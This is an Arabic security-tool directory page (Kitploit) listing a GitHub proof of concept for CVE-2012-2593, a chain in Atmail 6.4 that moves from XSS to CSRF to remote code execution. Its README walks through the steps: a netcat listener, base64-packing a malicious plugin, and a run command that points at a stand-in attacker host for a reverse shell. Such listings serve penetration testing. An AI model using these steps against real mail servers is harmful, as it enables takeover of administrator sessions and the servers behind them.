Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2012-2593 — سلسلة استغلال XSS-CSRF-RCE في Atmail | Kitploit
أدوات/GitHubGitHub/andrewtrube/cve-2012-2593
أطر الاستغلالتوليد الحمولةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

سلسلة استغلال XSS-CSRF-RCE في Atmail

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سلسلة استغلال XSS-CSRF-RCE في Atmail - PoC

atmail-rce.py: يستغل CVE-2012-2593 في واجهة البريد الإلكتروني لـ Atmail.

atmail-csrf.js: ملف جافاسكريبت يستخدم CVE 2012-2593 لتحويلها إلى CSRF لتثبيت إضافة ضارة تنفذ شيل عكسي

Plugin.php: إضافة Atmail سيتم تثبيتها تستدعي شيل عكسي

!!استخدم فقط ضد خوادم لديك إذن لاختبارها

الملخص

يحتوي خادم البريد الإلكتروني Atmail الإصدار 6.4 على ثغرة XSS في كل من رأس البريد Date وجسم البريد (عبر حقن iFrame). يتم استغلال هذه الثغرة لتحويلها إلى CSRF باستخدام واجهة برمجة تطبيقات XHR في جافاسكريبت لإرسال طلب يحمل ملف تعريف الارتباط الخاص بالمستخدم المسؤول إلى لوحة الإدارة، لتثبيت إضافة ضارة تنفذ كودًا لشيل عكسي.

إثبات المفهوم

  1. ابدأ مستمع netcat nc -lvp 4444
  2. افتح Plugin.php وقم بتغيير عنوان IP والمنفذ إلى عنوان مستمع netcat الخاص بك
  3. اضغط Plugin باستخدام gzip وقم بتشفيره بـ base64 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. انسخ والصق المخرجات أعلاه في متغير data في atmail-csrf.js
  5. شغّل النص atmail-rce.py python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. انتظر حتى يسجل دخول المستخدم المسؤول إلى بريده الإلكتروني

تحذيرات

  • يعمل فقط إذا كان هدف XSS هو مستخدم مسؤول في Atmail
  • يعمل فقط إذا كان الهدف مسجل دخول في كل من واجهة البريد الإلكتروني وواجهة الإدارة للخادم
  • يعمل فقط إذا كان تثبيت الإضافات مسموحًا به على الخادم (مفعل افتراضيًا)
تنزيل الأداة